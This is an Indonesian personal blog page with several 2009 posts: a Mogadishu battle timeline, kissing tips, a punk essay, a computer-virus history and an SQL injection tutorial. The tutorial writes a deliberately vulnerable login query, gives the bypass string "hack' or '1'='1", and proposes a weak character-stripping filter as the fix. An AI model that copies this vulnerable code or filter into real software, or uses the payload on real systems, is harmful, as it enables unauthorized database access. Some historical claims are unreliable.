WAKTU MAKASSAR
WELCOM TO MY BLOGGER

SEBELUMX KAMI MOHON MAAF APA BILA BLOGGER INI MASIH SEDERHANA, SEMOGA ANDA TIDAK JENUH DAN BOSAN.


TERIMA KASIH ATAS KUNJUNGANX
PEGUNJUNG

MY FRIENDSTER N YM

Minggu, Juni 07, 2009

BLACK HAWK DOWN

Nama Operasi : " Operation Serpent Gothic "
Sandi : " Irene "
Konflik : Perang Saudara di Somalia
Tanggal : 3 - 4 Oktober 1993
Durasi pertempuran : 15 Jam
Lokasi : Mogadishu, Somalia


Misi : Menangkap para pembantu 'Warlord' Mohhamed Farrah Aidid
Target :
- Omar Salad ( Perdana Menteri Aidid )
- Mohammed Hassan Awale ( Penasihan Politik Utama Aidid )
Lokasi target : Bakkara Market


Hasil operasi :

- Tertangkapnya jajaran pimpinan klan 'Habr Gidr' yg merupakan klan yang berkuasa pimpinan Aidid
- Jatuhnya 2 helikopter MH-60 Blackhawk
- Gugurnya 18 prajurit AS dari kesatuan Ranger dan Delta Force sementara 73 lainnya terluka


-----------------------------------------

Perbandingan kekuatan :
- AS : Gabungan pasukan Ranger, unit Delta Force dan Navy SEALS dibawah komando US. Special Operation Forces
Jumlah : 160 personil

- Aidid : 2000 milisi bersenjata didukung penduduk sipil yang berasal dari klan 'Habr Gidr'


-----------------------------------------

Unit2 tempur AS yang terlibat adalah :
- Bravo Company ( Kompi Bravo ) dari 75th Ranger Regiment - 3rd Battalyon - 10th Mountain Division.
- Unit Delta Force
- Navy SEALS.


------------------------------------------

------------------------------------------



Pada 3 Oktober 1993, "Operation Code Irene" yang dilakukan oleh United States Army Special Operations Command menjadi operasi yang melibatkan "Close Combat" paling intensif sejak keterlibatan AS di perang Vietnam.

Bahkan dalam Perang teluk sekalipun pasukan2 darat AS tidak pernah mengalami kontak tembak jarak dekat seberat Mogadishu.

Operasi tersebut merupakan bagian dari operasi Gothic Serpent yang dilakukan AS dalam menangkap orang2 terdekat Mohhamed Farrah Aidid - pemimpin klan Habr - Gidr yg melakukan blokade terhadap pasokan bahan makanan yang dilakukan PBB terhadap penduduk Somalia.

Dalam operasi yang seharusnya hanya sebuah Commando Raid Operation berubah menjadi pertempuran close combat dari rumah - kerumah dan kemudian membesar menjadi Urban Warfare yg melibatkan seluruh kekuatan milisi Aidid.

Dalam pertempuran berdarah yg berlangsung lebih kurang 15 jam tersebut AS kehilangan 18 prajuritnya sementara milisi Somalia kehilangan hampir 2000 anggotanya dimana 300 - 500 diantaranya adalah anggota pengawal pribadi Aidid sendiri.



Dok.foto : US.Ranger menantikan airlift helikopter seusai melakukan latihan di gurun Somalia sebelum operasi


Prosedur Operasi

1. Elemen2 udara dari unit SOAR akan memberikan 'air support' selama operasi berjalan.
- MH-60 Blackhawks
- MH-6 Little Birds ( Escort - Gunship )

2. Infiltrasi elemen2 utama darat dilakukan melalui serbuah komando ( Lihat Map 1)
- Task Force Ranger ( TFR) yang terbagi atas 4 regu yg disebut 'Chalk' akan melakukan rapeling / turun tali dengan cepat dan mengamankan 4 sisi bangunan yang jadi target serangan komando.
- Satuan komando Delta Force dari 1st SFOD - D didaratkan diatas bangunan dengan MH-6 Little Birds dan langsung menyerbu kedalam bangunan.
- Menangkap target hidup - hidup.

3. Evakuasi akan dilakukan dengan dukungan unit2 mobil dari kesatuan darat pendukung.
- Konvoi dari Task Force Ranger ( TFR ) akan menjemput pasukan penyerbu utama sekaligus mengangkut semua tawanan kembali ke markas lewat jalan darat
- Unit2 SOAR akan memberikan memberikan perlindungan udara dalam perjalanan kembali ke markas.

Map 1



Pukul 14:49, 3 Oktober 1993 : informan di pasar Bakara melaporkan bahwa 2 target terlihat memasuki gedung yang dijadikan sasaran.

15:32
Setelah Briefing terakhir, code operasi diberikan : " IRENE !! "

Pasukan komando gabungan AS bergerak meninggalkan Markas mereka yg terletak di Mogadishu Airport.
19 Helikopter, 12 kendaran darat dan 160 prajurit menuju sasaran.

Dok.foto : Helikopter MH - 60 Blackhawk yg dipiloto oleh CWO Michael Durant bergerak menuju sasaran

15:42 — Serbuan dimulai, 1st SFOD mendarat id atap bangunan dan menyerbu masuk. 4 regu Rangers ( Chalks ) diturunkan dengan tali di ke 4 sisi bangunan. Prajurit Todd Blackburn terjatuh dari ketinggian 30 meter ke jalan.

15:47 — Massa penduduk sekitar pasar Bakkara mulai berkumpul di sekitar lokasi.

15:58 — Salah satu truk konvoi darat dalam perjalanan menuju ke lokasi dihantam roket dan rusak berat. 5 prajurit terluka.

16:00 — Milisi2 bersenjata mulai dikerahkan ke daerah pasar Bakkara. Penduduk sekitar pasar membakar ban2 mobil sebagai signal untuk memanggil para milisi bersenjata.

16:02 — Terget diamankan : unit Delta melaporkan bahwa para pemimpin klan yg jadi target mereka sudah diamankan. Semuanya berjumlah 21 tawanan. konvoi tiba di lokasi penyerbuan dan 3 kendaraan lebih dulu meninggalkan lokasi untuk membawa prajurit Todd Blackburn yg terluka kembali ke markas.

16:15 — Para milisi yg berbaur dengan penduduk sipil mulai menembaki pasukan AS di sekitar gedung. Pasukan AS belum membalas tembakan karena peraturan 'Rules of Enggagement' yg melarang mereka menembak ke arah kerumunan sipil.

16:20 — Helikopter Blackhawk pertama ditembak jatuh. 'Super 61' yg dipiloti oleh CWO Cliff Wolcott dihantam roket dan jatuh 5 blok sebelah Timur Laut lokasi sasaran.

16;22 — Massa penduduk Mogadishu mulai bergerak ke lokasi jatuhnya Super 61 ( Super Six - One ).

16:26 — Konvoi HUMVEEE mulai bergerak, para tawanan diangkut kedalam kendaraan dibawah hujanan tembakan milisi Aidid dari berbagai penjuru.HUMVEE convoy starts moving. Prisoners loaded, the convoy and ground forces all begin moving toward the downed chopper. Helikopter Black Hawk Super 64 yg dipiloti Michael Durant berhasil menemukan posisi jatuhnya Super 61 dan tetap melayang diatasnya sambil memberikan tembakan perlindungan menghalau massa yg makin mendekat. Sebagian pasukan Ranger mengambil jalan darat berjalan kaki menuju lokasi Super 61 atas panduan Super 64.

16;28 — Search dan Rescue dilakukan terhadap Super 61. Anggota 'PJ' ( Para-Jumper ), Sersan Tim Wilkinson diturunkan dengan tali untuk menyelamatkan crew dan mengamankan helikoper. Pilot dan Co-pilot Spuer 61 - CWo Cliff Wolcot dan Donovan Briley ditemukan sudah tewas.


16:35 — Konvoi utama tersesat karena salah jalan. Dalam usahanya kembali ke jalur konvoi berputar - putar di jalan2 Mogadishu dibawah hujanan tembakan dan kehilangan banyak anggotanya.

16:40 — Blackhawk kedua tertembak jatuh. super 64 yg dipiloti oleh Mike Durant dihantam roket dan jatuh 1 mil sebelah Barat Daya dari lokasi sasaran awal. Milisi dan massa penduduk Mogadishu yg tidak bisa mendekati lokasi jatuhnya heli Super 61 mengalihkan sasaran dan mendekati lokasi jatuhnya heli Mike Durant. 'Chalk 2' dibawah Sersan Matt Eversmann diperintahkan menuju lokasi jatuhnya Super 61.


16:42 — Karen pasukan darat sudah mendekati posisi jatuhnya Sper 61 dan konvoi kendaraan masih tersesat, maka 2 orang anggota Delta Force ; Sergeant 1st class Randall Shugart dan Master Sergeant Gary Gordon menjadi sukarelawan untuk diterjunkan mengamankan lokasi jatuhnya helikopter Durant sambil menunggu bantuan tiba. Hal ini dilakukan setelah melihat tanda2 bahwa Durant masih hidup.

16:54 — Konvoi HUMVEE yg tersesat terpaksa menghentikan pencarian arah mereka ke lokasi Super 61 karena harus segera kembali ke markas untuk merawat korban di pihak mereka sendiri. Perjalanan kembali ke airport Mogadishu dilakukan dibawah serangan para milisi dari atap2 bangunan.

17:03 — Konvoi darurat diberangkatkan dari Markas untuk membantu 2 anggota Delta yg terkepung di lokasi jatuhnya Super 64.

17:34 — Konvoi Darurat terpaksa kembali ke markas karena tidak bisa menembus ke lokasi jatuhnya Durant. Milisi2 Somalia keburu membentuk barikade di sekitar jatuhnya Super 64. Banyak korban terluka memaksa mereka kembali ke markas.
Sementara sisa pasukan darat yg sudah tiba di lokasi Super 61 ( crash site 1 ), Terpaksa melakukan posisi bertahan karena segara terkepung para sniper Aidid. Kopral Jamie Smith tertembak dan menderita luka parah.


17:40 — Setelah bertempur dengan gigih selama hampir 1 jam melawan ratusan milisi bersenjata, Randall Shugart tewas tertembak dan gary Gordon sendiri bertempur hingga kehabisan peluru dan dibunuh pada milisi dan massa sipil yg marah. Mike Durant yg terluka kemudian dibawa sebagai tawanan oleh milisi Aidid.

17:45 — Semua konvoi sudah kembali ke markas meninggalkan 90 prajurit yg masih terkepung ditengah kota dan mendirikan pertahanan disekitar lokasi jatuhnya heli pertama. Kopral Jamie Smith mengalami pendarahan yg parah akibat tertembak dan paramedis lapangan meminta evakuasi secepatnya.

19:08 — Black Hawk Super 6 melakukan manuver berani dengan terbang rendah dalam kecepatan tinggi diatas jalan diantara bangunan, melintasi lokasi pasukan Ranger yg terjebak kemudian melemparkan logistik seperti air, amunisi dan peralatan P3K. Anggota 'PJ' ( Para Jumper ) di heli tsb berhasil 'menarik' Kopral Jamie Smith untuk dibawa kembali ke markas.

20:27 — Kopral Ranger Jamie Smith gugur kehabisan darah.

22:00 — Joint Task Force Command meminta bantuan dari kesatuan lain. Konvoi dengan jumlah besar yg terdiri dari 2 kompi pasukan dari 10th Mountain Division bersama konvoi Ranger yg sudah kembali dari markas dibawah kawalan tank2 dari pasukan Pakistan dan Malaysia mempersiapkan serbuan untuk evakuasi.

23:23 — Konvoi besar bergerak menembus tengah kota Mogadishu.

4 Oktober, 1993 - tengah malam. pasukan Ranger masih terperangkap di dalam kota.

01:55 — Konvoi evakuasi mencapai posisi pasukan Ranger di lokasi jatuhnya Super 61 sementara sebagian lagi mencapai lokasi jatuhnya Super 64 namun tidak menemukan tanda2 personil AS.

03:00 — Anggota medis Ranger masih berjuang untuk membebaskan jenazah pilot Super 61 , Cliff Walcot yg terjepit di reruntuhan heli.

05:30 — Pasukan Rangers mulai bergerak ke bagian kota yg dikuasai pasukan PBB asal Pakistan. jenazah Wolcott akhirnya dibebaskan dan dievakuasi dengan kendaraan lapis baja.
Sementara 30 Ranger yg tidak kebagian tempat di konvoi terpaksa harus berjalan kaki menuju bagian kota yg dikuasai PBB.
Dalam perjalanan tsb pasukan Ranger dan beberapa anggota Delta Force masih harus bertempur menembus halangan2 dan hujan peluru milisi2 Aidid.

06:30 — Seluruh pasukan berhasil mencapai Stadion kota yg dikuasai pasukan PBB asal Pakistan. 18 gugur plus 73 terluka.

Ranger dibawah Kaptem Mike Steele berjuang menuju lokasi jatuhnya Super 61


Unit2 Ranger yg terjebak pertempuran dari rumah ke rumah




Sersan Shawn Nelson dan Sersan Eddie Yurek - bersama satu Ranger lagi - Twombly sempat terpisah dengan unit mereka dalam baku tembak


Mike Goodale ( gunner Helikopter Super 61 yg selamat saat kecelakaan ) dan Jeff Young


CFL James Smith ( Gunner Super 64 ), CW4 Raymond Frank ( Kopilot-nya Durant di Super 64 ) - keduanya gugur saat Super 64 tertembak jatuh, mengenakan lorang tanpa topi adalah Mike Goodale ( Gunner Super 61 yg selamat ) - latar belakang adalah Super 64.


Sersan Matt Eversmann ( paling kiri didepan ) - komandan 2nd platoon sekaligus komandan Chalk 2 dalam operasi ( dalam film Black Hawk Down diperankan oleh Josh hartnet )


John Thomas - Dale Seizemore sebelum misi


Anggota pendarat Ranger "Chalk four"
__________________

Those who fell....

SFC Randall Shugart dan MSgt Gary Gordon adalah prajurit AS pertama yg menerima MEDAL OF HONOR sejak perang Vietnam


" SFC RANDALL SHUGHART AND MSGT GARY GORDON RECEIVED THE MEDAL OF HONOR AFTER THE OCT 3 FIREFIGHT. THEY BOTH WERE KILLED DURING THE FIGHT TRYING TO RESCUE DOWNED PILOT MIKE DURANT. THESE ARE THE FIRST MOH TO BE AWARDED SINCE THE VIETNAM WAR "

"Without a doubt, I owe my life to these two men and their bravery." - CW3 Mike Durant pilot Super 64.

CWO.Michael 'Mike' Durant - pilot Super 64 yg sempat tertawan oleh milisi Aidid


Durant sesaat setelah dibebaskan


Shugart dan Gary Gordon adalah 2 anggota Delta Force yg menjadi sukarelawan untuk melindungi lokasi jatuhnya Durant dari kepungan ratusan milisi dan massa Mogadishu.
Setelah bertempur selama 40 menit dan kehabisan amunisi keduanya terbunuh.
Setelah Shugart tewas lebih dulu, Gary Gordon memberikan senapannya yg tinggal berisi 5 butir peluru kepada Mike Durant yg cidera dan berkata " Good luck " setelah itu Gary Gordon bertempur hanya menggunakan pistol hingga dia kehabisan peluru dan terbunuh.

Korban gugur lainnya :

Sersan Lorenzo Ruiz - Ranger


Sersan Casey Joyce - Ranger


SPC James Cavaco - Ranger


PFC Richard Kowalewski - Ranger


Kopral James Smith - Ranger


Sersan Dominick Pilla - Ranger


MSG Timothy Martin - Delta Force


SFC Matthew Rierson - Delta Force


SFC Earl Fillmore - Delta Force


CWO Cliff Wolcot - pilot Super 61


CWO Raymond Frank - copilot Super 64


CWO Donovan Brilley - Copilot Super 61


SSG William Cleveland - Crew Super 64


SSG Thomas Field - Crew Super 64


SSG Daniel Busch - Crew Super 61


PFC James Martin - Ranger

Sabtu, April 04, 2009

TEKNIK SQL

Mungkin di antara Anda sudah banyak yang mengenal teknik serangan terhadap aplikasi yang dinamakan "SQL Injection". SQL Injection atau dalam bahasa Indonesia, artinya: Suntikan SQL (Structure Query Language), telah banyak memakan korban. Karena dengan mengetahui teknik serangan ini, Anda sudah bisa mengelabui aplikasi database. Untuk itu, bagi Anda yang baru mengenal teknik serangan ini, ada baiknya untuk menyimak ulasan berikut.



Untuk mengetahui secara mudah tentang dampak dari serangan ini, kita mengambil contoh pada proses "LOGIN". Proses "LOGIN" adalah proses yang paling vital dalam setiap aplikasi yang ada. Karena dengan adanya proses ini, masing-masing user dapat ditentukan haknya dalam mengakses suatu aplikasi. Contohnya pada aplikasi-aplikasi perkantoran, proses "LOGIN" sangat berguna untuk menentukan jabatan dan pekerjaan apa yang harus dilakukan seorang karyawan dalam aplikasi yang dibuat.

Dari pada kita membayang-bayangkan, lebih baik kita praktek langsung agar lebih mudah dicerna. Di sini kita bersama-sama membuat contoh aplikasi Visual Basic dengan Database Access. Untuk itu buatlah desain form seperti yang tampak pada gambar dibawah ini.




Biarkan Property Name pada masing-masing control apa adanya. Selanjutnya kita desain sebuah database sederhana. Buatlah database Microsoft Access dengan nama tabel "login" yang berisi kolom (field) "user" dan "password", lalu namakan databasenya "pegawai.mdb". Isikan dengan beberapa record.

Setelah semuanya selesai, pindah ke apliasi Visual Basic 6, tulislah code berikut pada Form1.
Kode::
Private Sub Command1_Click()
Data1.RecordSource = "SELECT * FROM LOGIN WHERE USER='" & Text1.Text & _
"' AND PASSWORD='" & Text2.Text & "'"
Data1.Refresh

If Data1.Recordset.RecordCount > 0 Then
MsgBox "Login Berhasil!"
Else
MsgBox "Login Salah!"
End If
End Sub

Private Sub Form_Load()
Data1.RecordSource = "SELECT * FROM LOGIN"
Data1.Refresh
End Sub


Sekarang, cobalah program tersebut. Lakukan pengujian dengan memasukkan user dan password yang salah. Jika Anda menemukan pesan "Login Salah!" maka proses berjalan dengan normal. Namun biar lebih memastikan bahwa program berjalan baik, coba juga dengan memasukkan user dan password yang benar. Jika Anda tidak salah memasukkan user dan password, maka pesan yang keluar adalah "Login Berhasil!". Artinya sampai saat ini pengujian program berjalan dengan baik. Terus apa lagi yang dipikirkan? Inilah suatu kecerobohan yang terkadang sering muncul dalam aplikasi yang dibuat para programmer. Para programmer sering lupa akan sisi keamanan aplikasi yang dibuat.

Untuk melihat dampak dari serangan ini. Jalankan kembali aplikasi yang kita buat, dan anggaplah Anda sebagai orang lain yang tidak mengetahui password untuk mengakses aplikasi tersebut. Namun dengan sedikit SQL Injection anda dapat memasuki ruang login hanya dengan memasukkan teks berikut "hack' or '1'='1" (tanpa tanda kutip) pada textbox input user dan/atau password. Maka Anda tidak akan melihat pesan "Login Salah!" melainkan "Login Berhasil!".

Terus, bagaimana ini bisa terjadi? padahal kita tidak memasukkan password sesungguhnya?

Ketika kita memasukkan user "meyer" dan password "tomero", maka query sql pada code diatas akan menjadi :
Kutipan::

SELECT * FROM LOGIN WHERE USER='meyer' AND PASSWORD='tomero'"


Karena SQL menggunakan kriteria berdasarkan user dan password tersebut, maka jika user dan password tidak cocok dengan yang ada dalam tabel secara otomatis aplikasi memunculkan pesan "Login Salah!". Tapi, jika kita memasukkan teknik SQL Injection pada query melalui input pada aplikasi misalkan user dan password "hack' or '1'='1", apa yang terjadi pada query sebenarnya?
Kutipan::

"SELECT * FROM LOGIN WHERE USER='hack' or '1'='1' " & _
AND PASSWORD='hack' or '1'='1'"


Kita dapat melihat, bahwa query SQL sudah berubah menjadi query yang tidak menampilkan filter terhadap user dan password. Itu dikarenakan pernyataan "OR 1=1" menyebabkan hasil execute query yang menghasilkan nilai True. Mengapa True? Dalam logika matematika, False Or True atau True Or True menghasilkan nilai True. Untuk hal ini saya tidak akan membicarakan panjang lebar. Anda bisa membacanya dalam pelajaran logika Matematika atau Pemrograman. Hasil pengembalian nilai True ini pada query tadi mengakibatkan seluruh record akan ditampilkan, karena semua kriteria berlaku pada semua record. Trik yang menyenangkan, bukan?

Dari percobaan yang sudah kita buat, kita dapat menggambarkan bagaimana cara untuk menghindari serangan ini. Selanjutnya kita akan membuat contoh sederhana prosedur untuk memfilter input yang dimasukkan oleh orang agar tidak bisa dicurangi dengan SQL Injection.
Kode::
Private Function FilterSQL(strInput As String) As String
strInput = Replace(strInput, "'", "''", 1, -1, 1)
strInput = Replace(strInput, "_xp", "", 1, -1, 1)
strInput = Replace(strInput, "--", "", 1, -1, 1)
strInput = Replace(strInput, ";", "", 1, -1, 1)

FilterSQL = strInput
End Function


Prosedur diatas akan mengubah semua karakter-karakter yang berdampak pada teknik SQL Injection ini. Untuk itu tambahkan prosedur tersebut dalam code sebelumnya dan gantilah query SQL untuk proses filter user dan password seperti code berikut.
Kode::
Data1.RecordSource = "SELECT * FROM SISWA WHERE NAMA='" & FilterSQL(Text1.Text) & _
"' AND ASAL='" & FilterSQL(Text2.Text) & "'"
Data1.Refresh

Akhir kata, sekian dulu tutorialnya untuk saat ini. Namun seperti biasa, sebelum saya menutup pelajaran hari ini, saya mau memberikan PR agar Anda dapat lebih memahami tutorial ini dengan baik dan lebih berhati-hati lagi saat membuat modul Login di aplikasi Anda. Untuk itu, silahkan Anda coba lakukan percobaan SQL Injection pada code yang belum di proteksi, agar dapat melakukan manipulasi record seperti "UPDATE" atau "DELETE". Oke, sekian dari saya. Salam Damai Sejahtera. Tomero

Kamis, April 02, 2009

20 cara berciuman paling Hot

1. Spesial Valentine.

Tinggalkan jejak ciuman berbentuk “V” di wajah pasangan Anda. Diawali dimata kanan, turun perlahan-lahan ke hidung, bibir, dagu, dan berakhir dimata kiri.

2. Serba 14

Kasih tahu dia bahwa berkaitan dengan tanggal 14,maka akan ada 14 kali ciuman untuknya sepanjang hari itu. Buat ia menunggu-nunggu, jenis ciuman apa saja yang ia dapatkan berikutnya.

3. Ala Jadoel.
Seperti di film-film kuno tahun 1950-an, pegang erat dagu pasangan dengan dua telapak, dekatkan wajah perlahan-lahan, lalu beri dia ciuman di bibir dengan amat sangat lembut.

4. Bisik Menelisik
Dalam suasana sehari-hari dan rutin, mendadak peluklah ia dari belakang,bisikkan betapa Anda mencintainya, cium lembut telinganya, lalu
lepaskan segera. Buatlah ia penasaran!

5. Tak Kusangka
Mirip dengan nomor 4, dalam suasana keseharian,tiba- tiba ciumlah secara sekilas pipinya.Katakan betapa pentingnya ia dalam hidup Anda.

6. Matamu Matahariku
Saat menjelang berciuman, kala matanya menutup,alihkan ciuman ke kedua kelopak matanya secara cepat dan ringan.

7. Kucing-kucingan
Bermainlah seperti kucing. Elus kedua kakinya sembari mengeong berharap pada datangnya ciuman.

8. Kiss Hard
Elus rambutnya, raba bagian belakang kepalanya,lalu tarik kepalanya mendekat, lalu cium dengan dalam, lama, dan dengan cara agak kasar. Ini hanya bisa dilakukan jika hubungan keduanya sudah cukup lama.

9. Daftar Belanjaan
Saat belanja berdua di toko grosir yang besar,berlombalah mencari satu item barang. Yang pertama menemukan berhak mendapatkan ciuman.

10.Second Chance
Seolah-olah seperti sebuah ciuman perpisahan biasa yang pendek dan sekilas saja. Tapi segera setelah itu, raih tangannya, lakukan ciuman kedua yang panjang, dalam, dan bergelora.

11.Sebuah Penantian
Telepon dia pagi-pagi, janjikan sebuah ciuman malam nanti. Setelah makan siang beri reminder akan janji itu. Lalu 2 jam sebelum pertemuan.
Lalu 1 jam. 30 menit. 15 menit. Dan pada akhirnyaketemuan, lakukanlah secara perlahan, lambat,mendalam, lembut, dan lamaaaaa sekali.

12.Dokter Cinta
Buatlah sebuah chart tes ketajaman mata dengan huruf yang semakin bawah kian mengecil, sepertibiasa ditemukan di ruang praktek dokter mata.Pada huruf terkecil tulislah, “If you can read thisyou are standing close enough to kiss me.”

13.Ciuman Hadiah
Janjikan sebuah ciuman untuk setiap rokok yang tidak dihisapnya, untuk setiap hari di mana pakaian dan sepatu ditaruh rapi dan sopan pada tempatnya.

14.Terlanjur Basah
Saat turun hujan deras, pergilah ke luar berdua danmem buka payung. Kemudian ciumlah dia. Ketika makin hot, lemparkan payung jauh-jauh, lanjutkan ciuman sampai kalian benar-benar kuyup.

15.Ciuman Sedingin Es
Kulumlah sebuah es batu, lalu kalian berduaberciuman. Cobalah memindahkan es batu dari mulut ke mulut. Pasti menyenangkan dan penuh kejutan.

16.Spiderman Kiss
Persis seperti adegan filmnya. Berciuman secara terbalik. Sensasional! Caranya bergelantungan kayak Spiderman, gimana? Ya pikirin sendiri, dong.

17.Spider Kiss
Saat sedang berciuman, gigitlah secara lembut salahsatu bibirnya. Awas, jangan sampai menyakiti dia.Rasa gemas akan menyebabkan ia menginginkan ciuman tambahan.

18.Pernafasan Buatan
Kala berenang berdua, masukkan kepala ke dalam air,tahan nafas, lalu beri dia pernafasan buatan. Bisa juga sih pernafasan buatannya di darat saja. Ngapain repot-repot dalam air.

19.Ciuman Astronomi
Berbaringlah berdua di udara terbuka, mengamati bintang-bintang. Untuk setiap gugus bintang yang bisa dikenali, mintalah jatah ciuman. Demikian juga jika Anda berdua berhasil mengamati konstelasiyang sama.

20.Takut Kepergok
Dalam sebuah kesempatan pesta atau hari kerja biasa, menyelinaplah ke tangga darurat, atau didalam lift, atau sebuah pojok yang jarang dilalui orang lain. Berciumanlah di sana. Perasaan takut kepergok akan menghasilkan sensasi berbeda!

Ciptakan Suasana Romantis Bersama Pasangan Anda,dengan Tips-Tips Diatas,Semoga Bisa Membantu menjaga Keharmonisan Hubungan anda.

Selasa, Maret 24, 2009

Kenapa mesti Punk???

Banyak dari antara kita yang pernah mendengar "Punk not death" atau "Punk for life" atau 1 kata sederhana yaitu Punk… bahkan tidak sedikit dari kita yang mengadopsi punk attitude..!. Tapi diluar itu semua, kita tidak memahami arti punk itu sendiri. Bagaimana punk itu bisa terlahir ke muka bumi ini, apa itu pedoman dan filosofi punk... di rubrik kali ini sedikit ingin saya ulas tentang asal – usul, filosofi dan arti dari semua atribut kehidupan tentang punk yang kebetulan pernah dan sedang menjalaninya.
Punk terlahir di Inggris pada awal tahun 80an. Dari awal lahir hingga sekarang Inggris tetap menjadi bassis terbesar di Dunia bagi komunitas Punk. Gerakan anak muda yang diawali oleh anak-anak kelas pekerja ini dengan segera merambah Inggris yang mengalami masalah ekonomi dan keuangan yang dipicu oleh kemerosotan moral oleh para tokoh politik yang memicu tingkat pengangguran dan kriminalitas yang tinggi. Punk berusaha menyindir para penguasa dengan caranya sendiri, melalui lagu-lagu dengan musik dan lirik yang sederhana namun terkadang kasar, beat yang cepat dan menghentak. Banyak yang menyalahartikan punk sebagai glue sniffer dan perusuh karena di Inggris pernah terjadi wabah penggunaan lem berbau tajam untuk mengganti bir yang tak terbeli oleh mereka. Banyak pula yang merusak citra punk karena banyak dari mereka yang berkeliaran di jalanan dan melakukan berbagai tindak kriminal. 
Asal usul kenapa banyak orang memanggil mereka dengan sebutan "punk" adalah karena dandanan serta atribut mereka yang cenderung urakan, mirip banci yang dalam artian bertindik, celana baggie ketat, spike, rantai, lipstick dan rambut yang berwarna warni. Penampilan yang diadopsi dari kumpulan para seniman yang anti terhadap kehidupan kemapanan dan glamour. Kumpulan avant garde!. Pakaian yang compang camping, robek di sana sini. Hingga dengan gaya Mohicans (rambut Mohawk) yang sering diperagakan diambil dengan alasan menyindir Inggris sebagai negara Adikuasa dimana mereka datang selalu untuk menguasai tanah – tanah leluhur para suku Indian. Mungkin sampai saat ini masih banyak orang yang mengingat bagaimana perjuangan dan pengorbanan suku indian (apache, sioux, dan lain lain) yang membela tanah kekuasaan mereka, saat itu terlihat jelas suku indian yang menentang total kedatangan bangsa inggris yang berusaha menerapkan sistem pemerintahan mereka. Sebuah sistem pemerintahan yang mengharuskan suku indian tunduk. di situlah letak kharisma tatanan rambut mohawk. Filosofi sepatu boot, sangat berkaitan erat dengat perkembangan jaman. Dikala itu bermunculan jenis – jenis atau aliran musik yang mewakili kehidupan para Punker, karena banyak para musisinya juga serong yang mengidolakan bahkan menjalani hidup sebagai Punk. 
Tahun berganti tahun, banyak bermunculan warna musik dengan dasar punk, muncul punk rock, reggae punk, dan lain – lainnya. Bahkan gaya hidup pun makin lama seperti tertata oleh jaman, dengan mewabahnya sebuah gaya baru dalam punk. Punk Street. Istilah yang diambil karena gaya hidup ini membawa kita untuk sering hidup atau lebih tepatnya hidup dari sudut – sudut jalanan. Entah itu terminal, halte stasiun, bahkan perempatan. Kehidupan yang sebenarnya Bukan tanpa Visi, punk street berkeliling dari satu tempat ke tempat lain demi membawa pesan moral mupun visi mereka yang sebenarnya. Sejatinya punk street adalah seorang bagpacker yang selalu berkeliling untuk mendapatkan teman dan pengalaman baru tanpa merusak maupun mengganggu siapapun yang ditemuinya. Gaya street punk yang unik, aneh, asing namun ada daya tarik (entah daya tarik buruk maupun bagus) membuat banyak ditiru oleh orang – orang yang melihat dan mungkin berinteraksi dengan punk street. Dari anak – anak kelas tinggi hingga anak – anak jalanan, mereka meniru dan meniru tanpa mau mengerti dasar filosofi semua peran yang dijalankan Punkers. Disinilah muncul sebuah penyamarataan arti atau stigma negatif orang – orang terhadap punk, terutama banyaknya anak jalanan yang meniru dandanan serta gaya punk dengan harapan menutupi kecuekan mereka atas tuntutan ekonomi yang menghimpit. 
Ada perbedaan mencolok yang sebenarnya bisa ditelaah, para punk street tidak akan bisa menjadi anak jalanan karena mereka punya visi misi untuk terus menjalankan hidupnya dengan semakin maju sedangkan anak jalanan tidak akan mungkin bisa seperti punk streer. Tetapi anjal bisa berpenampilan ala punk. Seorang punk street selalu berpindah-pindah hunian dan selalu merasakan tempat scan (tempat berkumpul nya anak-anak punk) baru. 
Rendahnya penghargaan mayoritas orang Indonesia terhadap sebuah hasil seni dan juga pandangan atau gaya hidup orang lain, menuntun punk street Indonesia bertahan hidup dengan cara mengamen. Dan karena itulah hanya di Indonesia kegiatan mengamen dilakukan. Diluar Indonesia kehidupan punk street bisa tertanggulangi dengan pengadaan konser – konser, akrobatik atau pameran – pameran lukisan yang semuanya mengakomodir hasil keahlian anggota punk. 
Karena punk street tinggal di jalanan, untuk itulah demi kenyamanan dan keamanan mereka mengenakan sepatu boot yang akhirnya mewabah di segala komunitas punk. Mungkin sampe saat ini banyak orang yang menilai anak punk adalah biang rusuh dan anarki. Tidak sepenuhnya setuju, meski mungkin pernah ada dimana, tapi visi misi yang penulis rangkum diatas bisa dijadikan referensi pemahaman seperti apa sebenarnya punk. Don’t jugde a book by its cover. 


Kamis, Maret 19, 2009

Sejarah Virus Komputer
    Virus komputer pertama kalinya tercipta bersamaan dengan komputer. Pada tahun 1949, salah seorang pencipta komputer, John von Newman, yang menciptakan Electronic Discrete Variable Automatic Computer (EDVAC), memaparkan suatu makalahnya yang berjudul “Theory and Organization of Complicated Automata”. Dalam makalahnya dibahas kemungkinan program yang dapat menyebar dengan sendirinya. Perkembangan virus komputer selanjutnya terjadi di AT&T Bell Laboratory salah satu laboratorium komputer terbesar di dunia yang telah menghasilkan banyak hal, seperti bahasa C dan C++.1 Di laboratorium ini, sekitar tahun 1960-an, setiap waktu istirahat para peneliti membuat permainan dengan suatu program yang dapat memusnahkan kemampuan membetulkan dirinya dan balik menyerang kedudukan lawan. Selain itu, program permainan dapat memperbanyak dirinya secara otomatis. Perang program ini disebut Core War, yaitu pemenangnya adalah pemilik program sisa terbanyak dalam selang waktu tertentu. Karena sadar akan bahaya program tersebut, terutama bila bocor keluar laboratorium tersebut, maka setiap selesai permainan, program tersebut selalu dimusnahkan. Sekitar tahun 1970-an , perusahaan Xerox memperkenalkan suatu program yang digunakan untuk membantu kelancaran kerja. Struktur programnya menyerupai virus, namun program ini adalah untuk memanfaatkan waktu semaksimal mungkin dan pada waktu yang bersamaan dua tugas dapat dilakukan. Pada tahun 1980-an, perang virus di dunia terbuka bermula atas pemaparan Fred Cohen, seorang peneliti dan asisten profesor di Universitas Cincinati, Ohio. Dalam pemaparannya, Fred juga mendemonstrasikan sebuah program ciptaannya, yaitu suatu virus yang dapat menyebar secara cepat pada sejumlah komputer. Sementara virus berkembang, Indonesia juga mulai terkena wabah virus. Virus komputer ini pertama menyebar di Indonesia juga pada
tahun 1988. Virus yang begitu menggemparkan seluruh pemakai komputer di Indonesia, saat itu, adalah virus ©Brain yang dikenal dengan nama virus Pakistan.


Pengertian Virus Komputer

   
